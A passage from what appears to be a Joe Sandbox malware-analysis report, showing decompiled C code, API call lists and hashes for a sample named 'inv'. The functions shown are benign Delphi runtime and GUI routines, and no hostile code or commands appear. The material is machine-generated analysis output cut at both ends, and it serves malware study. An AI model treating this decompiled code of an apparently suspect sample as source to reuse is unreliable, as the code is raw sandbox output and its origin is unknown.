					SetBkColor( *(_t36 + 4),  !(E0041BA40(E0041C6C4( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041BA40(E0041C6C4( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}




                                  0x0041cf25
                                  0x0041cf30
                                  0x0041cf42
                                  0x0041cf51
                                  0x0041cf8b
                                  0x0041cf9c
                                  0x0041cf53
                                  0x0041cf65
                                  0x0041cf76
                                  0x0041cf76

                                  APIs
                                    • Part of subcall function 0041C700: CreateBrushIndirect.GDI32(?), ref: 0041C7AA
                                  • UnrealizeObject.GDI32(00000000), ref: 0041CF30
                                  • SelectObject.GDI32(?,00000000), ref: 0041CF42
                                  • SetBkColor.GDI32(?,00000000), ref: 0041CF65
                                  • SetBkMode.GDI32(?,00000002), ref: 0041CF70
                                  • SetBkColor.GDI32(?,00000000), ref: 0041CF8B
                                  • SetBkMode.GDI32(?,00000001), ref: 0041CF96
                                    • Part of subcall function 0041BA40: GetSysColor.USER32(?), ref: 0041BA4A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                  • String ID:
                                  • API String ID: 3527656728-0
                                  • Opcode ID: 53ab403dc158ced5f445598ecf5fb444c902524bcbbde6f5e5d025a4b5dd3e29
                                  • Instruction ID: 8d122ef9bccf4ded3db906400f2e27ef29be24ced6a95f8d462c6412ee018f1c
                                  • Opcode Fuzzy Hash: 53ab403dc158ced5f445598ecf5fb444c902524bcbbde6f5e5d025a4b5dd3e29
                                  • Instruction Fuzzy Hash: 8FF0CD716801019BDE00FFAADDC6E5B67986F08309704806AB905DF197CA79E8605B39
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405A31, Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405A31(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x44f5b8)) =  *((intOrPtr*)(__eax - 0x44f5b8)) + __eax - 0x44f5b8;
				 *0x44d008 = 2;
				 *0x44f014 = 0x4011fc;
				 *0x44f018 = 0x401204;
				 *0x44f04a = 2;
				 *0x44f000 = E00404BAC;
				if(E00402F20() != 0) {
					_t3 = E00402F50();
				}
				E00403014(_t3);
				 *0x44f050 = 0xd7b0;
				 *0x44f21c = 0xd7b0;
				 *0x44f3e8 = 0xd7b0;
				 *0x44f03c = GetCommandLineA();
				 *0x44f038 = E0040130C();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x44f5bc = E00405968(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x44f5bc = E00405968(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x44f5bc = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x44f030 = _t11;
				return _t11;
			}





                                  0x00405a31
                                  0x00405a36
                                  0x00405a3b
                                  0x00405a3d
                                  0x00405a44
                                  0x00405a4e
                                  0x00405a58
                                  0x00405a5f
                                  0x00405a70
                                  0x00405a72
                                  0x00405a72
                                  0x00405a77
                                  0x00405a7c
                                  0x00405a85
                                  0x00405a8e
                                  0x00405a9c
                                  0x00405aa6
                                  0x00405aba
                                  0x00405af3
                                  0x00405abc
                                  0x00405aca
                                  0x00405ae2
                                  0x00405acc
                                  0x00405acc
                                  0x00405acc
                                  0x00405aca
                                  0x00405af8
                                  0x00405afd
                                  0x00405b02

                                  APIs
                                    • Part of subcall function 00402F20: GetKeyboardType.USER32(00000000), ref: 00402F25
                                    • Part of subcall function 00402F20: GetKeyboardType.USER32(00000001), ref: 00402F31
                                  • GetCommandLineA.KERNEL32 ref: 00405A97
                                  • GetVersion.KERNEL32 ref: 00405AAB
                                  • GetVersion.KERNEL32 ref: 00405ABC
                                  • GetCurrentThreadId.KERNEL32 ref: 00405AF8
                                    • Part of subcall function 00402F50: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402F72
                                    • Part of subcall function 00402F50: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FC1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FA5
                                    • Part of subcall function 00402F50: RegCloseKey.ADVAPI32(?,00402FC8,00000000,?,00000004,00000000,00402FC1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FBB
                                  • GetThreadLocale.KERNEL32 ref: 00405AD8
                                    • Part of subcall function 00405968: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004059CE), ref: 0040598E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                  • String ID:
                                  • API String ID: 3734044017-0
                                  • Opcode ID: 24eefcff0feccf719166cb3fe59c2cc8c91256eedd5f3af68868034647623e8c
                                  • Instruction ID: ea6a7513798a2b8a7118e1e60821152daaaa1f8d5cdf079f986489b9749ef6a3
                                  • Opcode Fuzzy Hash: 24eefcff0feccf719166cb3fe59c2cc8c91256eedd5f3af68868034647623e8c
                                  • Instruction Fuzzy Hash: B6016DBD40024299E711BFB2A84A34A3AA0AB43309F14417FD540BA2F3DB7C014D9F2E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AE20, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040AE20(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x44f664; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040AE14(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0040818C( &_v273, 0x104, E0040BDAC(0x5c) + 1);
				_t74 = 0x40afa0;
				_t86 = 0x40afa0;
				_t83 =  *0x406bf8; // 0x406c44
				if(E00403264(_t87, _t83) != 0) {
					_t74 = E004042D0( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00408128(_t74, 0x40afa0);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40afa4;
					}
				}
				_t51 =  *0x44e0dc; // 0x4069a8
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x44f664; // 0x400000
				LoadStringA(E00404E7C(_t53),  *_t16,  &_v790, 0x100);
				E00403028( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E004087B0(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00408128(_v8, _t86);
			}































                                  0x0040ae20
                                  0x0040ae2c
                                  0x0040ae2f
                                  0x0040ae31
                                  0x0040ae3d
                                  0x0040ae4c
                                  0x0040ae76
                                  0x0040ae7c
                                  0x0040ae88
                                  0x0040ae8d
                                  0x0040ae93
                                  0x0040ae93
                                  0x0040aeb1
                                  0x0040aeb6
                                  0x0040aebb
                                  0x0040aec2
                                  0x0040aecf
                                  0x0040aed9
                                  0x0040aedd
                                  0x0040aee4
                                  0x0040aeed
                                  0x0040aeed
                                  0x0040aee4
                                  0x0040aefe
                                  0x0040af03
                                  0x0040af07
                                  0x0040af12
                                  0x0040af1f
                                  0x0040af2a
                                  0x0040af30
                                  0x0040af3d
                                  0x0040af43
                                  0x0040af4d
                                  0x0040af53
                                  0x0040af5a
                                  0x0040af60
                                  0x0040af67
                                  0x0040af6d
                                  0x0040af89
                                  0x0040af9c

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040AE3D
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040AE61
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040AE7C
                                  • LoadStringA.USER32 ref: 0040AF12
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID: Dl@
                                  • API String ID: 3990497365-927373621
                                  • Opcode ID: 2904a2c5e12620ca0172d4e8058f27286895b6e145a750d7b472ac1ded60cbf6
                                  • Instruction ID: f426a9e1a1ad010350638349d6d77f33b91149ba89d96953de8868f8f7eda468
                                  • Opcode Fuzzy Hash: 2904a2c5e12620ca0172d4e8058f27286895b6e145a750d7b472ac1ded60cbf6
                                  • Instruction Fuzzy Hash: 4E412F70A003589BDB21DB69CD85BDAB7BCAF18304F0440FAA548F7291DB789F948F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AE1E, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040AE1E(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x44f664; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040AE14(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E0040818C( &_v273, 0x104, E0040BDAC(0x5c) + 1);
				_t75 = 0x40afa0;
				_t89 = 0x40afa0;
				_t85 =  *0x406bf8; // 0x406c44
				if(E00403264(_t92, _t85) != 0) {
					_t75 = E004042D0( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00408128(_t75, 0x40afa0);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40afa4;
					}
				}
				_t51 =  *0x44e0dc; // 0x4069a8
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x44f664; // 0x400000
				LoadStringA(E00404E7C(_t53),  *_t16,  &_v790, 0x100);
				E00403028( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E004087B0(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00408128(_v8, _t89);
			}































                                  0x0040ae2c
                                  0x0040ae2f
                                  0x0040ae31
                                  0x0040ae3d
                                  0x0040ae4c
                                  0x0040ae76
                                  0x0040ae7c
                                  0x0040ae88
                                  0x0040ae8d
                                  0x0040ae93
                                  0x0040ae93
                                  0x0040aeb1
                                  0x0040aeb6
                                  0x0040aebb
                                  0x0040aec2
                                  0x0040aecf
                                  0x0040aed9
                                  0x0040aedd
                                  0x0040aee4
                                  0x0040aeed
                                  0x0040aeed
                                  0x0040aee4
                                  0x0040aefe
                                  0x0040af03
                                  0x0040af07
                                  0x0040af12
                                  0x0040af1f
                                  0x0040af2a
                                  0x0040af30
                                  0x0040af3d
                                  0x0040af43
                                  0x0040af4d
                                  0x0040af53
                                  0x0040af5a
                                  0x0040af60
                                  0x0040af67
                                  0x0040af6d
                                  0x0040af89
                                  0x0040af9c

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040AE3D
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040AE61
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040AE7C
                                  • LoadStringA.USER32 ref: 0040AF12
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID: Dl@
                                  • API String ID: 3990497365-927373621
                                  • Opcode ID: e8d420bdaa1093fa98fbbcc9c1f7322d4eb91586e317039e480925d73fd211fa
                                  • Instruction ID: 35498fbd8c1fdb66b13a943314d9a6aa55d9548a453c4752b4cdd02b6c9903f1
                                  • Opcode Fuzzy Hash: e8d420bdaa1093fa98fbbcc9c1f7322d4eb91586e317039e480925d73fd211fa
                                  • Instruction Fuzzy Hash: C3413070A002589BDB21DB69CC85BDAB7BCAF18304F0440FAA548F7291DB789F948F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402F50, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E00402F50() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x44d020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x44d020; // 0x1372
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x44d020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402FC1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x402fc8);
					return RegCloseKey(_v8);
				}
			}












                                  0x00402f51
                                  0x00402f53
                                  0x00402f5d
                                  0x00402f79
                                  0x00402fc8
                                  0x00402fda
                                  0x00402fdd
                                  0x00402fe6
                                  0x00402f7b
                                  0x00402f7d
                                  0x00402f7e
                                  0x00402f83
                                  0x00402f86
                                  0x00402f89
                                  0x00402fa5
                                  0x00402fac
                                  0x00402faf
                                  0x00402fb2
                                  0x00402fc0
                                  0x00402fc0

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402F72
                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FC1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FA5
                                  • RegCloseKey.ADVAPI32(?,00402FC8,00000000,?,00000004,00000000,00402FC1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FBB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                  • API String ID: 3677997916-4173385793
                                  • Opcode ID: 6de00f1ab390c22522da8f3be889208a8087dc91c4b7545ef3aac77ae82cd144
                                  • Instruction ID: 6386808eb33b2537639e2f71207c6ac8d2e08636e67ea17eda7bbbb670271562
                                  • Opcode Fuzzy Hash: 6de00f1ab390c22522da8f3be889208a8087dc91c4b7545ef3aac77ae82cd144
                                  • Instruction Fuzzy Hash: E5019279A50309BADB11DF909D42FA9B7BCEB09744F6001B6FA00F25D0E6795A10D75C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00444050, Relevance: 7.7, APIs: 5, Instructions: 171COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E00444050(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t202 = _t203;
				_v8 = __eax;
				E0042EEA8(_v8);
				_push(_t203);
				_push(0x4442a6);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x44f661; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E0042E604(_v8, 0, __edx, _t204);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E0042B90C(_v8, _t98, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E0042B950(_v8, _t100, _t214);
					}
					_t180 =  *0x4442b4; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E004436B0(_v8, 1, 1);
						E00432068(_v8, 1, 1, _t215);
					}
					E0042D05C(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x4442ad);
					return E0042EEB0(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x44fbb4; // 0x2191320
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
							_t155 =  *0x44fbb4; // 0x2191320
							E0041C0E8( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041C0E0( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x44fbb4; // 0x2191320
					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
					_t199 = E004443D8(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E004436B0(_v8, _t122, _t199);
						E00432068(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

















                                  0x00444050
                                  0x00444051
                                  0x00444058
                                  0x0044405e
                                  0x00444065
                                  0x00444066
                                  0x0044406b
                                  0x0044406e
                                  0x00444076
                                  0x00444081
                                  0x0044408c
                                  0x00444092
                                  0x00444094
                                  0x0044409e
                                  0x004440a9
                                  0x004440b8
                                  0x0044421a
                                  0x0044421d
                                  0x00444223
                                  0x00444225
                                  0x0044422c
                                  0x0044422c
                                  0x00444234
                                  0x0044423a
                                  0x0044423c
                                  0x00444243
                                  0x00444243
                                  0x0044424b
                                  0x00444251
                                  0x00444257
                                  0x00444259
                                  0x00444268
                                  0x0044427a
                                  0x0044427a
                                  0x0044428b
                                  0x00444292
                                  0x00444295
                                  0x00444298
                                  0x004442a5
                                  0x004440ce
                                  0x004440d8
                                  0x004440e3
                                  0x004440ec
                                  0x004440f8
                                  0x00444118
                                  0x00444118
                                  0x004440ec
                                  0x0044411d
                                  0x00444128
                                  0x00444136
                                  0x0044413b
                                  0x00444141
                                  0x00444143
                                  0x00444149
                                  0x00444152
                                  0x00444165
                                  0x00444174
                                  0x00444193
                                  0x00444193
                                  0x004441a3
                                  0x004441c2
                                  0x004441c2
                                  0x004441d2
                                  0x004441f1
                                  0x00444214
                                  0x00444214
                                  0x004441d2
                                  0x00000000
                                  0x00444143

                                  APIs
                                  • MulDiv.KERNEL32(00000000,?,00000000), ref: 0044410F
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044418B
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 004441BA
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 004441E9
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044420C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f845f4a3e96d8b9981dfebdd96a0ea0194fd2e65796992b25a1065b42e2b506e
                                  • Instruction ID: 31f97fbd89ccbe4e1290d52f4dde787fa5d5a12f7c3929e1dcae4cdaac780257
                                  • Opcode Fuzzy Hash: f845f4a3e96d8b9981dfebdd96a0ea0194fd2e65796992b25a1065b42e2b506e
                                  • Instruction Fuzzy Hash: 1371E434B00104EFDB00DBA9C589BAEB7F5BB89304F6541F5E808EB362C775AE459B44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043BC24, Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0043BC24(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x43be08);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E0043DBBC(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E0043F1F8(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E00403EA8( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E0040421C(_v16, 0x43be2c);
					if(_t153 != 0) {
						E0041C7E8( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E0041C1C0( *((intOrPtr*)(_v8 + 0xc))) |  *0x43be30;
							E0041C1CC( *((intOrPtr*)(_v8 + 0xc)), E0041C1C0( *((intOrPtr*)(_v8 + 0xc))) |  *0x43be30, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E004040D0(_v16);
							_t65 = E004042D0(_v16);
							DrawTextA(E0041CD58(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x43be0f);
							return E00403E10( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E0041BF00( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
								_t89 = E004040D0(_v16);
								_t91 = E004042D0(_v16);
								DrawTextA(E0041CD58(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E0041BF00( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
							} else {
								_t76 = E0041BA40(0xff00000d);
								_t78 = E0041BA40(0xff000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E0041BF00( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E0041CD58(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E004040D8( &_v16, 0x43be20);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
